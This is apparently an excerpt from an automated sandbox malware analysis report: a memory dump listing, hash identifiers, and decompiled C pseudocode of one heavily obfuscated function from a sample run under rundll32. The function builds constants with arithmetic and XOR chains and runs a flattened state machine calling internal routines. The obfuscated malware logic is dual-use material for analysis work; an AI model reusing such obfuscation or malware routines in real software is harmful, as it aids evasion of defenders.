                                                                                                                                    0x002d3df1
                                                                                                                                    0x002d3df2
                                                                                                                                    0x002d3df2
                                                                                                                                    0x002d3d96
                                                                                                                                    0x002d3d96
                                                                                                                                    0x002d3d96
                                                                                                                                    0x002d3df4
                                                                                                                                    0x002d3df6
                                                                                                                                    0x00000000
                                                                                                                                    0x002d3df6
                                                                                                                                    0x002d3d4d
                                                                                                                                    0x002d3d53
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002d3d60
                                                                                                                                    0x002d3d65
                                                                                                                                    0x002d3d6c
                                                                                                                                    0x00000000
                                                                                                                                    0x002d3d6c
                                                                                                                                    0x002d3c31
                                                                                                                                    0x002d3d16
                                                                                                                                    0x002d3d1b
                                                                                                                                    0x002d3d1d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002d3d23
                                                                                                                                    0x00000000
                                                                                                                                    0x002d3d23
                                                                                                                                    0x002d3c37
                                                                                                                                    0x002d3c3d
                                                                                                                                    0x002d3ce0
                                                                                                                                    0x002d3cef
                                                                                                                                    0x002d3cf4
                                                                                                                                    0x002d3cfb
                                                                                                                                    0x002d3d03
                                                                                                                                    0x00000000
                                                                                                                                    0x002d3d03
                                                                                                                                    0x002d3c43
                                                                                                                                    0x002d3c49
                                                                                                                                    0x002d3c9e
                                                                                                                                    0x002d3caa
                                                                                                                                    0x002d3cbe
                                                                                                                                    0x002d3cc4
                                                                                                                                    0x00000000
                                                                                                                                    0x002d3cc4
                                                                                                                                    0x002d3c4b
                                                                                                                                    0x002d3c51
                                                                                                                                    0x002d3c81
                                                                                                                                    0x002d3c86
                                                                                                                                    0x00000000
                                                                                                                                    0x002d3c86
                                                                                                                                    0x002d3c53
                                                                                                                                    0x002d3c59
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002d3c63
                                                                                                                                    0x002d3c68
                                                                                                                                    0x002d3c6a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002d3c70
                                                                                                                                    0x00000000
                                                                                                                                    0x002d3fad
                                                                                                                                    0x002d3fad
                                                                                                                                    0x002d3fad
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: )If$D}$D}$G$TRr$Y2($\Q$c{v$n)+$orh$rZM*${)t${)t$`$u#$xy
                                                                                                                                    • API String ID: 0-2742041174
                                                                                                                                    • Opcode ID: f457af18da1968f184e130b4c9dd99d2ca228f58459823416dde8edda6753f57
                                                                                                                                    • Instruction ID: 7aecd2809b8fda123f873e96561a0299285746d3d30e5acb9445c364cdbec205
                                                                                                                                    • Opcode Fuzzy Hash: f457af18da1968f184e130b4c9dd99d2ca228f58459823416dde8edda6753f57
                                                                                                                                    • Instruction Fuzzy Hash: 08C223B15183818BD378DF25C58ABCFBBE1BB84314F10891EE5D99A260DBB09959CF43
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002C2BD9 Relevance: 19.4, Strings: 15, Instructions: 636COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                    			E002C2BD9(intOrPtr __ecx) {
				char _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				char* _v60;
				intOrPtr _v64;
				signed int _v68;
				intOrPtr _v72;
				signed int _v76;
				char _v80;
				intOrPtr _v84;
				char _v88;
				char _v92;
				char _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				unsigned int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				void* _t716;
				void* _t717;
				void* _t718;
				intOrPtr _t730;
				intOrPtr _t732;
				void* _t733;
				signed int _t735;
				void* _t741;
				intOrPtr _t746;
				intOrPtr _t752;
				intOrPtr _t754;
				intOrPtr _t755;
				void* _t757;
				void* _t759;
				intOrPtr _t760;
				void* _t766;
				signed int _t772;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				void* _t783;
				intOrPtr _t792;
				void* _t807;
				void* _t812;
				void* _t842;
				intOrPtr _t848;
				void* _t864;
				intOrPtr _t866;
				signed int _t867;
				void* _t868;
				void* _t873;
				signed int* _t875;
				void* _t878;

				_t875 =  &_v396;
				_v56 = 0xa0cd19;
				_t873 = 0;
				_v84 = __ecx;
				_v52 = _v52 & 0;
				_t766 = 0x41de8e2;
				_v48 = _v48 & 0;
				_v300 = 0x1109eb;
				_v300 = _v300 + 0xcb;
				_v300 = _v300 | 0xecff95c2;
				_v300 = _v300 ^ 0xa1bddbbd;
				_v252 = 0xe28eec;
				_v252 = _v252 + 0x19d6;
				_v252 = _v252 | 0xcaf404bd;
				_v252 = _v252 ^ 0xcaf6acfe;
				_v124 = 0x517500;
				_v124 = _v124 + 0x84ec;
				_v124 = _v124 ^ 0x0051f9ec;
				_v344 = 0xbde49;
				_t772 = 0x31;
				_v344 = _v344 * 0x35;
				_v344 = _v344 << 9;
				_v344 = _v344 + 0x7afe;
				_v344 = _v344 ^ 0xea0ab4fe;
				_v232 = 0xd06c4e;
				_v232 = _v232 | 0x98bd8447;
				_v232 = _v232 + 0xffff492f;
				_v232 = _v232 ^ 0x98fd357e;
				_v236 = 0xf2a19d;
				_v236 = _v236 << 8;
				_v236 = _v236 | 0xeb063d66;
				_v236 = _v236 ^ 0xfba7bd66;
				_v304 = 0x7cba75;
				_v304 = _v304 << 0x10;
				_v304 = _v304 >> 0xd;
				_v304 = _v304 ^ 0x0005d3a8;
				_v220 = 0xced2db;
				_v220 = _v220 >> 0xb;
				_v220 = _v220 * 0x6a;
				_v220 = _v220 ^ 0x000ab444;
				_v356 = 0x98a5e4;
				_v356 = _v356 ^ 0xdd9204f6;
				_v356 = _v356 | 0x4689a95f;
				_v356 = _v356 * 0x48;
				_v356 = _v356 ^ 0xdf47a2b8;
				_v292 = 0x99ac6b;
				_v292 = _v292 * 0x35;
				_v292 = _v292 / _t772;
				_v292 = _v292 ^ 0x00a637e1;
				_v348 = 0x8d86f8;
				_v348 = _v348 + 0x9ec9;
				_v348 = _v348 + 0xfffff441;
				_v348 = _v348 * 0x3a;
				_v348 = _v348 ^ 0x2031e474;
				_v208 = 0x39dd97;
				_v208 = _v208 << 0x10;
				_v208 = _v208 + 0x9a19;
				_v208 = _v208 ^ 0xdd979a19;
				_v100 = 0xd2197;
				_v100 = _v100 + 0x97e4;
				_v100 = _v100 ^ 0x000db95b;
				_v324 = 0x771ce;
				_v324 = _v324 << 1;
				_v324 = _v324 ^ 0x580a954c;
				_v324 = _v324 ^ 0x580cba62;
				_v352 = 0xd79a55;
				_t867 = 0x4d;
				_v352 = _v352 / _t867;
				_v352 = _v352 << 5;
				_v352 = _v352 + 0xffffa0ed;
				_v352 = _v352 ^ 0x005b1fb1;
				_v264 = 0xbc6795;
				_v264 = _v264 + 0x99f5;
				_v264 = _v264 | 0xde86e00c;
				_v264 = _v264 ^ 0xdeb9ffad;
				_v240 = 0x2649df;
				_v240 = _v240 + 0x8f57;
				_v240 = _v240 + 0xffffdcf3;
				_v240 = _v240 ^ 0x002859eb;
				_v180 = 0x284ff;
				_v180 = _v180 + 0xfffffbe4;
				_v180 = _v180 ^ 0x0004b053;
				_v248 = 0x43d81c;
				_t773 = 0x2c;
				_v248 = _v248 * 0x30;
				_v248 = _v248 + 0x77f1;
				_v248 = _v248 ^ 0x0cb65cea;
				_v164 = 0x561af9;
				_v164 = _v164 * 0x5f;
				_v164 = _v164 ^ 0x1ff767f2;
				_v172 = 0x424117;
				_v172 = _v172 / _t773;
				_v172 = _v172 ^ 0x000edcdb;
				_v336 = 0xedf003;
				_v336 = _v336 + 0xffff11da;
				_v336 = _v336 >> 2;
				_v336 = _v336 >> 9;
				_v336 = _v336 ^ 0x000c05d4;
				_v216 = 0xec53cc;
				_v216 = _v216 | 0x30e2710b;
				_v216 = _v216 * 0x1f;
				_v216 = _v216 ^ 0xeced0588;
				_v224 = 0xc36dcc;
				_v224 = _v224 * 0x64;
				_v224 = _v224 * 0xc;
				_v224 = _v224 ^ 0x9413d5fd;
				_v148 = 0x5fde01;
				_v148 = _v148 ^ 0x51967584;
				_v148 = _v148 ^ 0x51c7dbee;
				_v156 = 0x26546c;
				_v156 = _v156 ^ 0x8ec08bcd;
				_v156 = _v156 ^ 0x8eeee361;
				_v396 = 0x210674;
				_v396 = _v396 ^ 0xb585172f;
				_v396 = _v396 >> 9;
				_v396 = _v396 ^ 0x5fa8c9ed;
				_v396 = _v396 ^ 0x5ff25ba7;
				_v112 = 0xa4fdb5;
				_v112 = _v112 ^ 0x7ac22777;
				_v112 = _v112 ^ 0x7a606cfd;
				_v160 = 0x7fe066;
				_v160 = _v160 | 0xe6d7910f;
				_v160 = _v160 ^ 0xe6fe40a3;
				_v152 = 0xb045a1;
				_v152 = _v152 ^ 0x0733bf74;
				_v152 = _v152 ^ 0x078d93a6;
				_v384 = 0x7bd524;
				_v384 = _v384 + 0xffff236c;
				_v384 = _v384 * 0x7b;
				_v384 = _v384 + 0xffffb98b;
				_v384 = _v384 ^ 0x3b1735e1;
				_v392 = 0x61d9a1;
				_v392 = _v392 + 0xab93;
				_v392 = _v392 + 0xffff054c;
				_v392 = _v392 | 0xc62dc39c;
				_v392 = _v392 ^ 0xc661791a;
				_v376 = 0x1528d1;
				_v376 = _v376 << 8;
				_v376 = _v376 + 0xffff31a1;
				_v376 = _v376 >> 9;
				_v376 = _v376 ^ 0x000f3b72;
				_v268 = 0x199e3d;
				_v268 = _v268 ^ 0x3c18ecc0;
				_v268 = _v268 >> 0xf;
				_v268 = _v268 ^ 0x00085298;
				_v116 = 0x9d324d;
				_t774 = 0x5b;
				_v116 = _v116 * 0x35;
				_v116 = _v116 ^ 0x2088a224;
				_v144 = 0xea008e;
				_v144 = _v144 * 0x31;
				_v144 = _v144 ^ 0x2cc3d943;
				_v200 = 0xbe23d7;
				_v200 = _v200 / _t774;
				_v200 = _v200 ^ 0x0006a720;
				_v368 = 0xbc3a01;
				_v368 = _v368 >> 2;
				_v368 = _v368 << 1;
				_v368 = _v368 | 0x91e27348;
				_v368 = _v368 ^ 0x91f48308;
				_v312 = 0x81ba05;
				_v312 = _v312 ^ 0x6d6d273d;
				_v312 = _v312 + 0x9af1;
				_v312 = _v312 ^ 0x6ded9aad;
				_v320 = 0xa9a2ca;
				_v320 = _v320 / _t867;
				_t775 = 0x39;
				_v320 = _v320 / _t775;
				_v320 = _v320 ^ 0x0005ef3e;
				_v136 = 0x8e55db;
				_t776 = 0xb;
				_v136 = _v136 / _t776;
				_v136 = _v136 ^ 0x00010f6d;
				_v296 = 0x9a02a3;
				_v296 = _v296 | 0xc0bbeea6;
				_v296 = _v296 ^ 0xfebfff47;
				_v296 = _v296 ^ 0x3e0de8e7;
				_v196 = 0x628794;
				_v196 = _v196 >> 7;
				_v196 = _v196 ^ 0x00033c53;
				_v360 = 0xc75687;
				_t777 = 0x55;
				_v360 = _v360 / _t777;
				_t778 = 0x4a;
				_v360 = _v360 / _t778;
				_t779 = 0x66;
				_v360 = _v360 / _t779;
				_v360 = _v360 ^ 0x0006bc1c;
				_v288 = 0xb89ddb;
				_t780 = 0x5c;
				_v288 = _v288 * 0x7b;
				_v288 = _v288 + 0x220a;
				_v288 = _v288 ^ 0x58b2320e;
				_v108 = 0x352a49;
				_v108 = _v108 | 0x42677ea4;
				_v108 = _v108 ^ 0x427d3f06;
				_v332 = 0x1123f9;
				_v332 = _v332 + 0xfffffbdd;
				_v332 = _v332 + 0xffff8b7f;
				_v332 = _v332 | 0xcf6269e1;
				_v332 = _v332 ^ 0xcf7a63e7;
				_v192 = 0x15ba5c;
				_v192 = _v192 + 0xffff7d63;
				_v192 = _v192 ^ 0x0011de47;
				_v204 = 0xd88287;
				_v204 = _v204 >> 1;
				_v204 = _v204 ^ 0x006fcfd9;
				_v308 = 0x394063;
				_v308 = _v308 | 0x23438f89;
				_v308 = _v308 ^ 0x95557e79;
				_v308 = _v308 ^ 0xb625da34;
				_v260 = 0x6632ca;
				_v260 = _v260 << 0xc;
				_v260 = _v260 / _t780;
				_v260 = _v260 ^ 0x011a1b64;
				_v316 = 0x1ead1d;
				_v316 = _v316 >> 0xf;
				_v316 = _v316 << 0xe;
				_v316 = _v316 ^ 0x000acc6a;
				_v388 = 0xc01c7d;
				_v388 = _v388 >> 9;
				_v388 = _v388 | 0xa159bc3f;
				_v388 = _v388 ^ 0x1058b9c4;
				_v388 = _v388 ^ 0xb10bd724;
				_v256 = 0x2459a9;
				_v256 = _v256 + 0xffff58c0;
				_v256 = _v256 >> 0xc;
				_v256 = _v256 ^ 0x000386a3;
				_v340 = 0xa38d0b;
				_t781 = 0x78;
				_v340 = _v340 / _t781;
				_v340 = _v340 ^ 0x3e3bd45c;
				_v340 = _v340 + 0xf3c0;
				_v340 = _v340 ^ 0x3e3a819a;
				_v380 = 0x2dd945;
				_v380 = _v380 << 4;
				_v380 = _v380 + 0xffffb7c2;
				_v380 = _v380 << 6;
				_v380 = _v380 ^ 0xb75574a7;
				_v272 = 0xf6939e;
				_v272 = _v272 | 0x851c2f86;
				_v272 = _v272 + 0xffff0412;
				_v272 = _v272 ^ 0x85fd1a3b;
				_v188 = 0x2c17e;
				_v188 = _v188 >> 3;
				_v188 = _v188 ^ 0x000c5ae0;
				_v280 = 0xf08b81;
				_v280 = _v280 | 0x75266007;
				_v280 = _v280 ^ 0xc75f894a;
				_v280 = _v280 ^ 0xb2a4e63e;
				_v372 = 0x6f48a0;
				_v372 = _v372 << 0xa;
				_v372 = _v372 >> 0x10;
				_v372 = _v372 | 0x5e122b7b;
				_v372 = _v372 ^ 0x5e16ce05;
				_v184 = 0x747075;
				_v184 = _v184 + 0xcea0;
				_v184 = _v184 ^ 0x007a5d3b;
				_v128 = 0x4ebeca;
				_v128 = _v128 + 0xffffee54;
				_v128 = _v128 ^ 0x004a846f;
				_v120 = 0xe78fe5;
				_t868 = 0x80c65ec;
				_v120 = _v120 + 0xffff4f7b;
				_t864 = 0xf9e92c1;
				_v120 = _v120 ^ 0x00e2ece2;
				_v276 = 0xe2917e;
				_v276 = _v276 << 6;
				_v276 = _v276 + 0xffff0dfb;
				_v276 = _v276 ^ 0x38a72339;
				_v176 = 0x1ec236;
				_v176 = _v176 ^ 0x7af5486d;
				_v176 = _v176 ^ 0x7aeb8f45;
				_v244 = 0x4d92e1;
				_t782 = 0x5f;
				_v88 = 0x20;
				_v244 = _v244 * 0x4a;
				_v244 = _v244 | 0x7c3f7c28;
				_v244 = _v244 ^ 0x7e7c1ac2;
				_v284 = 0xc8aa60;
				_v284 = _v284 + 0x32b9;
				_v284 = _v284 + 0xffff127a;
				_v284 = _v284 ^ 0x00c1b775;
				_v228 = 0x32f957;
				_v228 = _v228 << 0xa;
				_v228 = _v228 ^ 0xe304a089;
				_v228 = _v228 ^ 0x28edcf32;
				_v364 = 0x1a55e7;
				_v364 = _v364 * 0x68;
				_v364 = _v364 * 0x36;
				_v364 = _v364 ^ 0xa842ca33;
				_v364 = _v364 ^ 0xe9f59c27;
				_v168 = 0x34b570;
				_v168 = _v168 | 0x6b6928c5;
				_v168 = _v168 ^ 0x6b739674;
				_v104 = 0x8a8082;
				_v104 = _v104 * 0x3f;
				_v104 = _v104 ^ 0x2214377a;
				_v212 = 0x18307b;
				_v212 = _v212 ^ 0x4b6e1055;
				_v212 = _v212 ^ 0x41119872;
				_v212 = _v212 ^ 0x0a6c434c;
				_v132 = 0x8b3f3c;
				_v132 = _v132 << 2;
				_v132 = _v132 ^ 0x022c35f2;
				_v328 = 0x314aa5;
				_v328 = _v328 | 0xbabb419f;
				_v328 = _v328 / _t782;
				_v328 = _v328 + 0xe73f;
				_v328 = _v328 ^ 0x01f1132e;
				_v140 = 0x403514;
				_v140 = _v140 + 0xffff4e06;
				_v140 = _v140 ^ 0x0039264a;
				while(1) {
					L1:
					_t783 = 0xf0ee26a;
					_t842 = 0xbf4f028;
					_t716 = 0xc1f5c56;
					do {
						while(1) {
							L2:
							_t878 = _t766 - _t716;
							if(_t878 > 0) {
								break;
							}
							if(_t878 == 0) {
								_push(_v160);
								_push(_v112);
								_t732 = E002DDCF7(_v396, 0x2c1884, __eflags);
								_push(_v392);
								_t866 = _t732;
								_push(_v384);
								_t733 = E002DDCF7(_v152, 0x2c1924, __eflags);
								_v76 = _v124;
								_t735 = E002CCB52(_v376, _t866, _v268, _v116, _v144);
								_v68 = _v68 & 0x00000000;
								_v72 = _t866;
								_v80 = 2 + _t735 * 2;
								_v60 =  &_v80;
								_v92 = _v88;
								_v64 = 1;
								_t741 = E002C8D13( &_v32, _v200, _v368,  &_v92, _v84, _t733, _v312,  &_v68, _v88, _v320, _v136, _v236);
								_t875 =  &(_t875[0x11]);
								__eflags = _t741 - _v304;
								_t766 =  ==  ? 0xbf4f028 : 0xf9e92c1;
								E002CA8B0(_v296, _t866, _v196);
								E002CA8B0(_v360, _t733, _v288);
								_t864 = 0xf9e92c1;
								goto L24;
							} else {
								if(_t766 == 0xdec32e) {
									_t746 =  *0x2e3dfc; // 0x0
									E002D8519(_v104, _v212,  *((intOrPtr*)(_t746 + 0x50)));
									_t766 = _t864;
									while(1) {
										L1:
										_t783 = 0xf0ee26a;
										_t842 = 0xbf4f028;
										_t716 = 0xc1f5c56;
										goto L2;
									}
								} else {
									if(_t766 == 0x41de8e2) {
										_t766 = 0xe078043;
										continue;
									} else {
										if(_t766 == _t868) {
											_push(_v128);
											_push(_v184);
											_t871 = E002DDCF7(_v372, 0x2c1904, __eflags);
											_t585 =  &_v300; // 0x3e0de8e7
											_v44 =  *_t585;
											_v40 = _v252;
											_pop(_t807);
											_v36 = _v100;
											_t752 =  *0x2e3dfc; // 0x0
											_t754 =  *0x2e3dfc; // 0x0
											_t755 =  *0x2e3dfc; // 0x0
											_t757 = E002DD84C(_t807, _v120, _t755 + 0x64, _v276,  *((intOrPtr*)(_t754 + 0x54)), _v96, _v176, _v244, _v284, _v228, _v292, _t807, _t748,  &_v44,  *((intOrPtr*)(_t752 + 0x50)));
											_t875 =  &(_t875[0xd]);
											__eflags = _t757 - _v348;
											if(_t757 != _v348) {
												_t766 = 0xdec32e;
											} else {
												_t766 = _t864;
												_t873 = 1;
											}
											E002CA8B0(_v364, _t871, _v168);
											goto L24;
										} else {
											_t882 = _t766 - _t842;
											if(_t766 == _t842) {
												_push(_v192);
												_push(_v332);
												_t759 = E002DDCF7(_v108, 0x2c18b4, _t882);
												_pop(_t812);
												_t760 =  *0x2e3dfc; // 0x0
												E002E0B68(_t759,  &_v92, _v220, _v204, _t812, _t760 + 0x54, _v308, _v260, _v316, _v388, _v96, _v256);
												_t766 =  ==  ? 0xf0ee26a : _t864;
												E002CA8B0(_v340, _t759, _v380);
												L23:
												_t875 =  &(_t875[0xb]);
												L24:
												_t842 = 0xbf4f028;
												_t783 = 0xf0ee26a;
												_t868 = 0x80c65ec;
												_t716 = 0xc1f5c56;
											}
										}
										goto L25;
									}
								}
							}
							L20:
							return _t873;
						}
						__eflags = _t766 - 0xe078043;
						if(__eflags == 0) {
							_push(_v264);
							_push(_v352);
							_t717 = E002DDCF7(_v324, 0x2c18e4, __eflags);
							_push(_v248);
							_push(_v180);
							_t718 = E002DDCF7(_v240, 0x2c1814, __eflags);
							_t665 =  &_v172; // 0x39264a
							__eflags = E002C9462(_t717,  *_t665,  &_v96, _t718, _v336, _v344) - _v232;
							_t766 =  ==  ? 0xc1f5c56 : 0x1d0239b;
							E002CA8B0(_v216, _t717, _v224);
							E002CA8B0(_v148, _t718, _v156);
							_t864 = 0xf9e92c1;
							goto L23;
						} else {
							__eflags = _t766 - _t783;
							if(_t766 == _t783) {
								_t848 =  *0x2e3dfc; // 0x0
								_push(_t783);
								_push(_t783);
								_t792 = E002C7FF2( *((intOrPtr*)(_t848 + 0x54)));
								_t730 =  *0x2e3dfc; // 0x0
								__eflags = _t792;
								_t766 =  !=  ? _t868 : _t864;
								 *((intOrPtr*)(_t730 + 0x50)) = _t792;
								goto L1;
							} else {
								__eflags = _t766 - _t864;
								if(__eflags != 0) {
									goto L25;
								} else {
									_t646 =  &_v140; // 0x39264a
									E002C957D(_v96, _v132, _v328, _v208,  *_t646);
								}
							}
						}
						goto L20;
						L25:
					} while (_t766 != 0x1d0239b);
					goto L20;
				}
			}







































































































































                                                                                                                                    0x002c2bd9
                                                                                                                                    0x002c2bdf
                                                                                                                                    0x002c2bee
                                                                                                                                    0x002c2bf0
                                                                                                                                    0x002c2bf7
                                                                                                                                    0x002c2bfe
                                                                                                                                    0x002c2c03
                                                                                                                                    0x002c2c0a
                                                                                                                                    0x002c2c12
                                                                                                                                    0x002c2c1a
                                                                                                                                    0x002c2c22
                                                                                                                                    0x002c2c2a
                                                                                                                                    0x002c2c35
                                                                                                                                    0x002c2c40
                                                                                                                                    0x002c2c4b
                                                                                                                                    0x002c2c56
                                                                                                                                    0x002c2c61
                                                                                                                                    0x002c2c6c
                                                                                                                                    0x002c2c77
                                                                                                                                    0x002c2c88
                                                                                                                                    0x002c2c89
                                                                                                                                    0x002c2c8d
                                                                                                                                    0x002c2c92
                                                                                                                                    0x002c2c9a
                                                                                                                                    0x002c2ca2
                                                                                                                                    0x002c2cad
                                                                                                                                    0x002c2cb8
                                                                                                                                    0x002c2cc3
                                                                                                                                    0x002c2cce
                                                                                                                                    0x002c2cd9
                                                                                                                                    0x002c2ce1
                                                                                                                                    0x002c2cec
                                                                                                                                    0x002c2cf7
                                                                                                                                    0x002c2cff
                                                                                                                                    0x002c2d04
                                                                                                                                    0x002c2d09
                                                                                                                                    0x002c2d11
                                                                                                                                    0x002c2d1c
                                                                                                                                    0x002c2d2e
                                                                                                                                    0x002c2d35
                                                                                                                                    0x002c2d40
                                                                                                                                    0x002c2d48
                                                                                                                                    0x002c2d50
                                                                                                                                    0x002c2d5d
                                                                                                                                    0x002c2d61
                                                                                                                                    0x002c2d69
                                                                                                                                    0x002c2d76
                                                                                                                                    0x002c2d80
                                                                                                                                    0x002c2d84
                                                                                                                                    0x002c2d8c
                                                                                                                                    0x002c2d94
                                                                                                                                    0x002c2d9c
                                                                                                                                    0x002c2da9
                                                                                                                                    0x002c2dad
                                                                                                                                    0x002c2db5
                                                                                                                                    0x002c2dc0
                                                                                                                                    0x002c2dc8
                                                                                                                                    0x002c2dd3
                                                                                                                                    0x002c2dde
                                                                                                                                    0x002c2de9
                                                                                                                                    0x002c2df4
                                                                                                                                    0x002c2dff
                                                                                                                                    0x002c2e07
                                                                                                                                    0x002c2e0b
                                                                                                                                    0x002c2e13
                                                                                                                                    0x002c2e1d
                                                                                                                                    0x002c2e29
                                                                                                                                    0x002c2e2e
                                                                                                                                    0x002c2e34
                                                                                                                                    0x002c2e39
                                                                                                                                    0x002c2e41
                                                                                                                                    0x002c2e49
                                                                                                                                    0x002c2e54
                                                                                                                                    0x002c2e5f
                                                                                                                                    0x002c2e6a
                                                                                                                                    0x002c2e75
                                                                                                                                    0x002c2e80
                                                                                                                                    0x002c2e8b
                                                                                                                                    0x002c2e96
                                                                                                                                    0x002c2ea1
                                                                                                                                    0x002c2eac
                                                                                                                                    0x002c2eb7
                                                                                                                                    0x002c2ec2
                                                                                                                                    0x002c2ed5
                                                                                                                                    0x002c2ed6
                                                                                                                                    0x002c2edd
                                                                                                                                    0x002c2ee8
                                                                                                                                    0x002c2ef3
                                                                                                                                    0x002c2f06
                                                                                                                                    0x002c2f0d
                                                                                                                                    0x002c2f18
                                                                                                                                    0x002c2f2c
                                                                                                                                    0x002c2f33
                                                                                                                                    0x002c2f3e
                                                                                                                                    0x002c2f46
                                                                                                                                    0x002c2f4e
                                                                                                                                    0x002c2f53
                                                                                                                                    0x002c2f58
                                                                                                                                    0x002c2f60
                                                                                                                                    0x002c2f6b
                                                                                                                                    0x002c2f7e
                                                                                                                                    0x002c2f85
                                                                                                                                    0x002c2f90
                                                                                                                                    0x002c2fa3
                                                                                                                                    0x002c2fb2
                                                                                                                                    0x002c2fb9
                                                                                                                                    0x002c2fc4
                                                                                                                                    0x002c2fcf
                                                                                                                                    0x002c2fda
                                                                                                                                    0x002c2fe5
                                                                                                                                    0x002c2ff0
                                                                                                                                    0x002c2ffb
                                                                                                                                    0x002c3006
                                                                                                                                    0x002c300e
                                                                                                                                    0x002c3016
                                                                                                                                    0x002c301b
                                                                                                                                    0x002c3023
                                                                                                                                    0x002c302b
                                                                                                                                    0x002c3036
                                                                                                                                    0x002c3041
                                                                                                                                    0x002c304c
                                                                                                                                    0x002c3057
                                                                                                                                    0x002c3062
                                                                                                                                    0x002c306d
                                                                                                                                    0x002c3078
                                                                                                                                    0x002c3083
                                                                                                                                    0x002c308e
                                                                                                                                    0x002c3096
                                                                                                                                    0x002c30a3
                                                                                                                                    0x002c30a7
                                                                                                                                    0x002c30af
                                                                                                                                    0x002c30b7
                                                                                                                                    0x002c30bf
                                                                                                                                    0x002c30c7
                                                                                                                                    0x002c30cf
                                                                                                                                    0x002c30d7
                                                                                                                                    0x002c30df
                                                                                                                                    0x002c30e9
                                                                                                                                    0x002c30ee
                                                                                                                                    0x002c30f6
                                                                                                                                    0x002c30fb
                                                                                                                                    0x002c3103
                                                                                                                                    0x002c310e
                                                                                                                                    0x002c3119
                                                                                                                                    0x002c3121
                                                                                                                                    0x002c312c
                                                                                                                                    0x002c3141
                                                                                                                                    0x002c3144
                                                                                                                                    0x002c314b
                                                                                                                                    0x002c3156
                                                                                                                                    0x002c3169
                                                                                                                                    0x002c3170
                                                                                                                                    0x002c317b
                                                                                                                                    0x002c3191
                                                                                                                                    0x002c3198
                                                                                                                                    0x002c31a3
                                                                                                                                    0x002c31ab
                                                                                                                                    0x002c31b0
                                                                                                                                    0x002c31b4
                                                                                                                                    0x002c31bc
                                                                                                                                    0x002c31c4
                                                                                                                                    0x002c31cc
                                                                                                                                    0x002c31d4
                                                                                                                                    0x002c31dc
                                                                                                                                    0x002c31e4
                                                                                                                                    0x002c31f4
                                                                                                                                    0x002c31fc
                                                                                                                                    0x002c3201
                                                                                                                                    0x002c3207
                                                                                                                                    0x002c320f
                                                                                                                                    0x002c3221
                                                                                                                                    0x002c3226
                                                                                                                                    0x002c322f
                                                                                                                                    0x002c323a
                                                                                                                                    0x002c3242
                                                                                                                                    0x002c324a
                                                                                                                                    0x002c3252
                                                                                                                                    0x002c325a
                                                                                                                                    0x002c3265
                                                                                                                                    0x002c326d
                                                                                                                                    0x002c3278
                                                                                                                                    0x002c3284
                                                                                                                                    0x002c3289
                                                                                                                                    0x002c3293
                                                                                                                                    0x002c3298
                                                                                                                                    0x002c32a2
                                                                                                                                    0x002c32a5
                                                                                                                                    0x002c32a9
                                                                                                                                    0x002c32b1
                                                                                                                                    0x002c32c2
                                                                                                                                    0x002c32c5
                                                                                                                                    0x002c32cc
                                                                                                                                    0x002c32d7
                                                                                                                                    0x002c32e2
                                                                                                                                    0x002c32ed
                                                                                                                                    0x002c32f8
                                                                                                                                    0x002c3303
                                                                                                                                    0x002c330b
                                                                                                                                    0x002c3313
                                                                                                                                    0x002c331b
                                                                                                                                    0x002c3323
                                                                                                                                    0x002c332b
                                                                                                                                    0x002c3336
                                                                                                                                    0x002c3341
                                                                                                                                    0x002c334c
                                                                                                                                    0x002c3357
                                                                                                                                    0x002c335e
                                                                                                                                    0x002c3369
                                                                                                                                    0x002c3371
                                                                                                                                    0x002c3379
                                                                                                                                    0x002c3381
                                                                                                                                    0x002c3389
                                                                                                                                    0x002c3394
                                                                                                                                    0x002c33a7
                                                                                                                                    0x002c33ae
                                                                                                                                    0x002c33b9
                                                                                                                                    0x002c33c1
                                                                                                                                    0x002c33c6
                                                                                                                                    0x002c33cb
                                                                                                                                    0x002c33d3
